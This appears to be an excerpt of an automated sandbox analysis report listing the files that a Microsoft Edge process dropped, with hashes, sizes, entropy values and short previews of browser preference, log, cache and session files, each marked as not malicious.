MD5:	0DAD8D7F079797377CD56DAE47E1A619
SHA1:	A353C01C5B9BA9E0315ABA74D3337B7D6EE97CB2
SHA-256:	7BDA584E0C1BE9E104065370FD279A7E771D7EB4F7E4CC7C80F146931F150E33
SHA-512:	5A57C0D303672564DDEAA08B5DAAEE1BA24B67C46100720CE69F0908427ACE55F330D96A772D0E1F96B595FBBD70E6145AA464FC4F312EFE095F9AC909E304E8
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	9814
Entropy (8bit):	5.114689039739387
Encrypted:	false
SSDEEP:	192:stKkdpesD9SsZihUkRu/8GbV+FcPQA66WHaFIMYNPCYJ:stKQesD9SfhgbGOQx6WHaTYZ
MD5:	E0D9EAB77B6AF243DEC384221D470451
SHA1:	4EA2259663F12D388BCD9E8E4F0221C7553CF4EC
SHA-256:	43F0958ED5200B9B00A2E20AE709D323CD5F75550883B22F71572A757D06B2FC
SHA-512:	DB4897569707C2437CB32824CE3A3303D4430646AF0063BD934AF552BE207F8CF691CBE7085EE72A81178D79277A19F67ABD18105A68A567A53F41F129E377C2
Malicious:	false
Preview:	{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13379753431743412","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"l

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RF4e461.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	9814
Entropy (8bit):	5.114689039739387
Encrypted:	false
SSDEEP:	192:stKkdpesD9SsZihUkRu/8GbV+FcPQA66WHaFIMYNPCYJ:stKQesD9SfhgbGOQx6WHaTYZ
MD5:	E0D9EAB77B6AF243DEC384221D470451
SHA1:	4EA2259663F12D388BCD9E8E4F0221C7553CF4EC
SHA-256:	43F0958ED5200B9B00A2E20AE709D323CD5F75550883B22F71572A757D06B2FC
SHA-512:	DB4897569707C2437CB32824CE3A3303D4430646AF0063BD934AF552BE207F8CF691CBE7085EE72A81178D79277A19F67ABD18105A68A567A53F41F129E377C2
Malicious:	false
Preview:	{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13379753431743412","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"l

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	25012
Entropy (8bit):	5.567564277775104
Encrypted:	false
SSDEEP:	768:2qjDYjDhejDkWPimDHfB8DB8F1+UoAYDCx9Tuqh0VfUC9xbog/OVvqjyDCjDhrwP:2CkNywWPHLfKdu1jaCj2+Setn
MD5:	E5DC346E79818144CB06BC9ACFE4A46F
SHA1:	D9FBDD1AC2B3F5D2964986F68BDB3DDDCA47C684
SHA-256:	81307BA005C2AB9C2F0A40D14C51F25233E44B24ED1D5E686A440D8F0AEDCDCF
SHA-512:	16C90FB2D9E3E96685C58C9E1E1E9EA0FF076F6117A106D964606B41F4750FDB302C5300EFDFBED7C8ABA3A616E8A02C871501EEA80CD7A7B96117ADEF179434
Malicious:	false
Preview:	{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13379753431098420","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13379753431098420","location":5,"ma

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences~RF4df6f.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	25012
Entropy (8bit):	5.567564277775104
Encrypted:	false
SSDEEP:	768:2qjDYjDhejDkWPimDHfB8DB8F1+UoAYDCx9Tuqh0VfUC9xbog/OVvqjyDCjDhrwP:2CkNywWPHLfKdu1jaCj2+Setn
MD5:	E5DC346E79818144CB06BC9ACFE4A46F
SHA1:	D9FBDD1AC2B3F5D2964986F68BDB3DDDCA47C684
SHA-256:	81307BA005C2AB9C2F0A40D14C51F25233E44B24ED1D5E686A440D8F0AEDCDCF
SHA-512:	16C90FB2D9E3E96685C58C9E1E1E9EA0FF076F6117A106D964606B41F4750FDB302C5300EFDFBED7C8ABA3A616E8A02C871501EEA80CD7A7B96117ADEF179434
Malicious:	false
Preview:	{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13379753431098420","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13379753431098420","location":5,"ma

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\000001.dbtmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.2743974703476995
Encrypted:	false
SSDEEP:	3:1sjgWIV//Uv:1qIFUv
MD5:	46295CAC801E5D4857D09837238A6394
SHA1:	44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
SHA-256:	0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
SHA-512:	8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
Malicious:	false
Preview:	MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	80
Entropy (8bit):	4.323098996850684
Encrypted:	false
SSDEEP:	3:chltUQ2Hm4kxH4xRNwBgzNnNurkXn:chXUQI2xH8BzNmen
MD5:	8DA62954B0B14642CF287A260418E39B
SHA1:	E82BF98669AE1D73BBD9294D9F454044D5C2622E
SHA-256:	B7E25784D1B3A3653C618822715DAE7CC86BF0B05FFF0CF3C5D6A1FB169F0614
SHA-512:	E44DC92CAA0579A81CBF176A589493421AAD851D7006603B54684EE8CBFC67F572F2B0219F4483227F3FF9CC614D882B2ADB8060873E358C7D6870CAF9E3865C
Malicious:	false
Preview:	....I................URES:0...INITDATA_NEXT_RESOURCE_ID.1..INITDATA_DB_VERSION.2

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\CURRENT (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.2743974703476995
Encrypted:	false
SSDEEP:	3:1sjgWIV//Uv:1qIFUv
MD5:	46295CAC801E5D4857D09837238A6394
SHA1:	44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
SHA-256:	0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
SHA-512:	8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
Malicious:	false
Preview:	MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	299
Entropy (8bit):	5.147688322627647
Encrypted:	false
SSDEEP:	6:BE9os1923oH+TcwtE/a252KLl3Etgq2P923oH+TcwtE/a2ZIFUv:BrBYeb8xLpBv4Yeb8J2FUv
MD5:	5115E8D248A56D08034CB971CFBCD7A4
SHA1:	AC59562A569368FEABF3E5DC9EAD6C1DB20EE822
SHA-256:	219C6B4F998084B5935CF5FD45699D84483BA1C47ADF4E315E1F395F4F6A7615
SHA-512:	B9EF253596C32C389B31EB5CFB21ECFF25FB546BED30CB8BAF254230364C90A30FCB3FE34331884F1167D4CB3E803C519F4104DB22F2555FECB9444427E798CF
Malicious:	false
Preview:	2024/12/27-01:10:47.099 16b0 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database since it was missing..2024/12/27-01:10:47.125 16b0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database/MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\MANIFEST-000001

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	OpenPGP Secret Key
Category:	dropped
Size (bytes):	41
Entropy (8bit):	4.704993772857998
Encrypted:	false
SSDEEP:	3:scoBAIxQRDKIVjn:scoBY7jn
MD5:	5AF87DFD673BA2115E2FCF5CFDB727AB
SHA1:	D5B5BBF396DC291274584EF71F444F420B6056F1
SHA-256:	F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
SHA-512:	DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
Malicious:	false
Preview:	.\|.."....leveldb.BytewiseComparator......

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\2cc80dabc69f58b6_0

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	114579
Entropy (8bit):	5.579926257807486
Encrypted:	false
SSDEEP:	1536:kU906yxPXfOxr1lhCe1nL/ImL/rBZXECjPXNtsf387ek1WZ/:J9LyxPXfOxr1lMe1nL/5L/TXE6n7do
MD5:	842A80C3F40BE5E49DC57B383B2431A9
SHA1:	54A6571111E80BFD72C9077C4B994D8766D7B3CF
SHA-256:	68913B22EE54038A73FA6A0CDA8B5F2339B0E6375C66897D52B25D8BFA148BCA
SHA-512:	2F474BDD1A6EB1E9EF720627DD465A25EB7E31C94EFBAEF99235F9A36F0D906520B2D138DBAF42CE1B7E7A1263127AE3A883FC63A776BCA4C98191ACF39D975F
Malicious:	false
Preview:	0\r..m..........rSG.....0!function(e,t){if("object"==typeof exports&&"object"==typeof module)module.exports=t();else if("function"==typeof define&&define.amd)define([],t);else{var s=t();for(var n in s)("object"==typeof exports?exports:e)[n]=s[n]}}(self,(()=>(()=>{"use strict";var e={894:()=>{try{self["workbox:cacheable-response:6.4.0"]&&_()}catch(e){}},81:()=>{try{self["workbox:core:6.4.0"]&&_()}catch(e){}},485:()=>{try{self["workbox:expiration:6.4.0"]&&_()}catch(e){}},484:()=>{try{self["workbox:navigation-preload:6.4.0"]&&_()}catch(e){}},248:()=>{try{self["workbox:precaching:6.4.0"]&&_()}catch(e){}},492:()=>{try{self["workbox:routing:6.4.0"]&&_()}catch(e){}},154:()=>{try{self["workbox:strategies:6.4.0"]&&_()}catch(e){}}},t={};function s(n){var a=t[n];if(void 0!==a)return a.exports;var r=t[n]={exports:{}};return e[n](r,r.exports,s),r.exports}s.g=function(){if("object"==typeof globalThis)return globalThis;try{return this\|\|new Function("return this")()}catch(e){if("object"==typeof window

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\2cc80dabc69f58b6_1

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	189113
Entropy (8bit):	6.38749934912343
Encrypted:	false
SSDEEP:	3072:2oZ+LFsgM0zwez7sLd47L/33vTg+cvY8yfDsN2P0U/8Ls:XGzwesLuL/HvcQ8lJs
MD5:	6C1DC26083A67077CD5A391DC262C43A
SHA1:	5511E400A7F2C56996A77E54511BBCFB64BD5731
SHA-256:	1A83E532879D6CE67FF7937DAC00B876AB3B977CB5D04807A331692251F36A3A
SHA-512:	1D9953E58C9BB048279F2BB073E2614C21044232137AB3B1DFDCB06548F2E52666B5C6D88F70C43BDA51D65BE6D97106D062A1456878BC98D301A329727F76CA
Malicious:	false
Preview:	0\r..m..........rSG.....0....z3.................;.....x.`........,T.8..`,.....L`.....,T...`......L`......Rc^M2d....exports...RcV,......module....Rc.0.....define....Rb.a.....amd....D..H...........".. ...".. ...!...a..2....]".. ...!...-.....!...\|..c.....>a...8v............*.........".. ...!........./..4.....).....$Sb............I`....Da......... ..f..........`...p...0...j...p..H........Q....15.{...https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=2880&networkTimeoutSeconds=5&bgTaskNetworkTimeoutSeconds=8&ssrBasePageNavAgeMinutes=360&enableEmptySectionRoute=true&enableNavPreload=true&enableFallbackVerticalsFeed=true&noCacheLayoutTemplates=true&cacheSSRBasePageResponse=true&enableStaticAdsRouting=true&enableWidgetsRegion=true.a........Db............D`.....E..A.`............,T.,.`......L`.....,T...`>....DL`.....DSb.....................q...1.c................I`....Da....@[...,T.`.`z.....L`..........a............a.........Dr8..............

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	24
Entropy (8bit):	2.1431558784658327
Encrypted:	false
SSDEEP:	3:m+l:m
MD5:	54CB446F628B2EA4A5BCE5769910512E
SHA1:	C27CA848427FE87F5CF4D0E0E3CD57151B0D820D
SHA-256:	FBCFE23A2ECB82B7100C50811691DDE0A33AA3DA8D176BE9882A9DB485DC0F2D
SHA-512:	8F6ED2E91AED9BD415789B1DBE591E7EAB29F3F1B48FDFA5E864D7BF4AE554ACC5D82B4097A770DABC228523253623E4296C5023CF48252E1B94382C43123CB0
Malicious:	false
Preview:	0\r..m..................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\temp-index

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	48
Entropy (8bit):	2.9972243200613975
Encrypted:	false
SSDEEP:	3:qf0dE/9nKl:qfZ/9Kl
MD5:	A17975F0CB558D4A8D94D310E400F3D5
SHA1:	2B1D152F4C107FF158A103209EF38E152D6DAD94
SHA-256:	6CDE2FCC47C1534FC06DE3AE10DE6F1C6B9F3F91A3BD7F1A21DEEFF504CAAA52
SHA-512:	205715BC299A8C3C561493AEF52236A808E744B35CA43957660326B301EB5D16ECF5FB54BEC697E95F4D35327918A88318AAB3746CC0DF66B5BC9E42CC4E0CA4
Malicious:	false
Preview:	(....z..oy retne.........................)f../.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	48
Entropy (8bit):	2.9972243200613975
Encrypted:	false
SSDEEP:	3:qf0dE/9nKl:qfZ/9Kl
MD5:	A17975F0CB558D4A8D94D310E400F3D5
SHA1:	2B1D152F4C107FF158A103209EF38E152D6DAD94
SHA-256:	6CDE2FCC47C1534FC06DE3AE10DE6F1C6B9F3F91A3BD7F1A21DEEFF504CAAA52
SHA-512:	205715BC299A8C3C561493AEF52236A808E744B35CA43957660326B301EB5D16ECF5FB54BEC697E95F4D35327918A88318AAB3746CC0DF66B5BC9E42CC4E0CA4
Malicious:	false
Preview:	(....z..oy retne.........................)f../.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	5503
Entropy (8bit):	3.4053794653055203
Encrypted:	false
SSDEEP:	96:L9dEbq5sQ3Z/0h9Xp+Q3MD+ViJokG6Ll9iSr/1VhG2mvVr4NVg:DEGoh9Xp+QWKiJD1Ll9iSr/XhGhVWg
MD5:	92C6874657A31E0D85A47341A5DF9010
SHA1:	0089C74331CEB861A5DC2FD0E03CB9F48383C6E4
SHA-256:	E4CB8A6B5D5BD56A9A16587E56662513ECE8DAC2F2079D745B4CD215973E8297
SHA-512:	AB0532DA294FA3182640FEDD2C3CF3222A65085C8A58B18BFF6DE091D71E22F090BDA11BA7B61ADD4AA28E676BBFB543B54936A911C72A6951C4D48A31722701
Malicious:	false
Preview:	*...#................version.1..namespace-..&f.................&f.................&f.................&f.................&f................Y..b................next-map-id.1.Cnamespace-684de2b7_628b_4e3d_a25e_5ac8bee944aa-https://ntp.msn.com/.0....:................map-0-shd_sweeper.({.".x.-.m.s.-.f.l.i.g.h.t.I.d.".:.".p.r.g.-.s.p.-.l.i.v.e.a.p.i.,.p.r.g.-.f.i.n.-.c.o.m.p.o.f.,.p.r.g.-.f.i.n.-.h.p.o.f.l.i.o.,.p.r.g.-.f.i.n.-.p.o.f.l.i.o.,.p.r.g.-.m.s.n.-.g.l.s.b.i.d.m.,.p.r.g.-.c.g.-.c.r.o.s.a.l.o.c.1.,.p.r.g.-.a.d.s.p.e.e.k.,.p.r.g.-.p.r.2.-.w.i.d.g.e.t.-.t.a.b.,.1.s.-.f.c.r.y.p.t.,.p.r.g.-.i.l.f.r.e.-.c.l.i.c.k.,.1.s.-.p.r.2.-.f.f.o.,.1.s.-.w.p.o.-.p.r.g.2.-.2.c.f.r.e.h.,.1.s.-.w.p.o.-.p.r.g.2.-.u.i.t.a.p.1.,.p.r.g.-.p.r.2.-.f.r.e.2.c.,.p.r.g.-.p.r.2.-.f.r.e.c.l.i.c.k.,.1.s.-.n.t.f.2.-.e.v.l.c.f.c.,.1.s.-.n.t.f.2.-.b.k.n.l.c.,.1.s.-.n.t.f.2.-.i.p.t.l.c.,.1.s.-.p.r.2.-.e.v.l.c.,.1.s.-.p.r.2.-.e.v.l.c.b.b.,.1.s.-.p.r.2.-.e.v.l.c.h.,.1.s.-.p.r.2.-.e.v.l.c.n.,.1.s.-.p.r.2.-.e.v.l.c.r.p.,.1.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	321
Entropy (8bit):	5.130501398640048
Encrypted:	false
SSDEEP:	6:BEaMM+q2P923oH+TcwtrQMxIFUt8UEjpZmw+UESqMVkwO923oH+TcwtrQMFLJ:BmM+v4YebCFUt8UQp/+UyMV5LYebtJ
MD5:	9A8058EF2A31A6DFF72E0D06C8F67181
SHA1:	49A5EE1E4ADB4F2DB6A212AD31EAAFA1BEF26116
SHA-256:	F7E7DA65A530AF64A19261A22710AE15E5C933BDCAB606EA0D3936DA30DF4D4C
SHA-512:	6A3861CEEE25D4960610597784CF357DF7EB577D6AC03397067B118100B0CAA5B9DC9CF732D6A97E1A8AA3C689F12C2726015027A1EA0B6C432D658AFC292886
Malicious:	false
Preview:	2024/12/27-01:10:31.825 a6c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/MANIFEST-000001.2024/12/27-01:10:31.826 a6c Recovering log #3.2024/12/27-01:10:31.829 a6c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	321
Entropy (8bit):	5.130501398640048
Encrypted:	false
SSDEEP:	6:BEaMM+q2P923oH+TcwtrQMxIFUt8UEjpZmw+UESqMVkwO923oH+TcwtrQMFLJ:BmM+v4YebCFUt8UQp/+UyMV5LYebtJ
MD5:	9A8058EF2A31A6DFF72E0D06C8F67181
SHA1:	49A5EE1E4ADB4F2DB6A212AD31EAAFA1BEF26116
SHA-256:	F7E7DA65A530AF64A19261A22710AE15E5C933BDCAB606EA0D3936DA30DF4D4C
SHA-512:	6A3861CEEE25D4960610597784CF357DF7EB577D6AC03397067B118100B0CAA5B9DC9CF732D6A97E1A8AA3C689F12C2726015027A1EA0B6C432D658AFC292886
Malicious:	false
Preview:	2024/12/27-01:10:31.825 a6c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/MANIFEST-000001.2024/12/27-01:10:31.826 a6c Recovering log #3.2024/12/27-01:10:31.829 a6c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sessions\Session_13379753433592422

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	1443
Entropy (8bit):	3.805966593858573
Encrypted:	false
SSDEEP:	24:3+lKxnReSdQqyeebRpsAF4unxToowtLp3X2amEtG1Chqqfy/wmDQKkOAM4B:3FRzBQzF8NLp2FEkCh/y4mMHOpa
MD5:	62FC7B74CB8AEFE61D0C7D8BFE5D1752
SHA1:	1B118BA7CF62604960E08CF7EE25DD4053A6E3CE
SHA-256:	DFB1971C6E5FD02294B22B1F46984118EC6DF9D1994939F12D737FF70318F10C
SHA-512:	CF7784B4143CAEAADDC1AA4D28A98876B1BC5150433700EEC4B30D74A7B9B4CD24A58091829A355031AFEDBC977C1A98A4BD89A35CD3ECD1ABD9C107FD00BAA9
Malicious:	false
Preview:	SNSS.........Fd.............Fd......"..Fd.............Fd.........Fd.........Fd.........Fd....!....Fd.................................Fd..Fd1..,.....Fd$...684de2b7_628b_4e3d_a25e_5ac8bee944aa.....Fd.........Fd.....'...........Fd.....Fd.........................Fd....................5..0.....Fd&...{98952893-68FF-4A5D-A164-705C709ED3DB}.......Fd.........Fd............................Fd.............Fd........edge://newtab/......N.e.w. .t.a.b...........!...............................................................x...............................x......... R:.... R:.................................. ...................................................r...h.t.t.p.s.:././.n.t.p...m.s.n...c.o.m./.e.d.g.e./.n.t.p.?.l.o.c.a.l.e.=.e.n.-.G.B.&.t.i.t.l.e.=.N.e.w.%.2.0.t.a.b.&.d.s.p.=.1.&.s.p.=.B.i.n.g.&.i.s.F.R.E.M.o.d.a.l.B.a.c.k.g.r.o.u.n.d.=.1.&.s.t.a.r.t.p.a.g.e.=.1.&.P.C.=.U.5.3.1.....................................8.......0.......8............................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Shortcuts

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.44194574462308833
Encrypted:	false
SSDEEP:	12:TLiNCcUMskMVcIWGhWxBzEXx7AAQlvsdFxOUwa5qgufTJpbZ75fOS:TLisVMnYPhIY5Qlvsd6UwccNp15fB
MD5:	B35F740AA7FFEA282E525838EABFE0A6
SHA1:	A67822C17670CCE0BA72D3E9C8DA0CE755A3421A
SHA-256:	5D599596D116802BAD422497CF68BE59EEB7A9135E3ED1C6BEACC48F73827161
SHA-512:	05C0D33516B2C1AB6928FB34957AD3E03CB0A8B7EEC0FD627DD263589655A16DEA79100B6CC29095C3660C95FD2AFB2E4DD023F0597BD586DD664769CABB67F8
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g....."....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	352
Entropy (8bit):	5.088853522118006
Encrypted:	false
SSDEEP:	6:BENwOq2P923oH+Tcwt7Uh2ghZIFUt8UEBZmw+UEbkwO923oH+Tcwt7Uh2gnLJ:B2hv4YebIhHh2FUt8Uu/+UC5LYebIhHd
MD5:	2118EEEA1D6019F8DBAA211E3F2DD81A
SHA1:	CA8709864123BE4ED3652FBBF381F2B24F3FF5D1
SHA-256:	726327752D4DFF62167AC0DD6AC8D32DBD7C849EB4F8A672624D62B2C71A414E
SHA-512:	6C4B1C4DD912F38FC389C0B00C1A10AEB9B7CCC971FB03D8843A6EEF6FD45B87A8D6ACAE7AA146BDAF1701510E09E2DEF06340B1FDEEA758E9FCC19159DADCC6
Malicious:	false
Preview:	2024/12/27-01:10:31.280 10d0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/MANIFEST-000001.2024/12/27-01:10:31.285 10d0 Recovering log #3.2024/12/27-01:10:31.285 10d0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	352
Entropy (8bit):	5.088853522118006
Encrypted:	false
SSDEEP:	6:BENwOq2P923oH+Tcwt7Uh2ghZIFUt8UEBZmw+UEbkwO923oH+Tcwt7Uh2gnLJ:B2hv4YebIhHh2FUt8Uu/+UC5LYebIhHd
MD5:	2118EEEA1D6019F8DBAA211E3F2DD81A
SHA1:	CA8709864123BE4ED3652FBBF381F2B24F3FF5D1
SHA-256:	726327752D4DFF62167AC0DD6AC8D32DBD7C849EB4F8A672624D62B2C71A414E
SHA-512:	6C4B1C4DD912F38FC389C0B00C1A10AEB9B7CCC971FB03D8843A6EEF6FD45B87A8D6ACAE7AA146BDAF1701510E09E2DEF06340B1FDEEA758E9FCC19159DADCC6
Malicious:	false
Preview:	2024/12/27-01:10:31.280 10d0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/MANIFEST-000001.2024/12/27-01:10:31.285 10d0 Recovering log #3.2024/12/27-01:10:31.285 10d0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\DawnCache\data_1

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	270336
Entropy (8bit):	0.0012471779557650352
Encrypted:	false
SSDEEP:	3:MsEllllkEthXllkl2zE:/M/xT02z
MD5:	F50F89A0A91564D0B8A211F8921AA7DE
SHA1:	112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
SHA-256:	B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
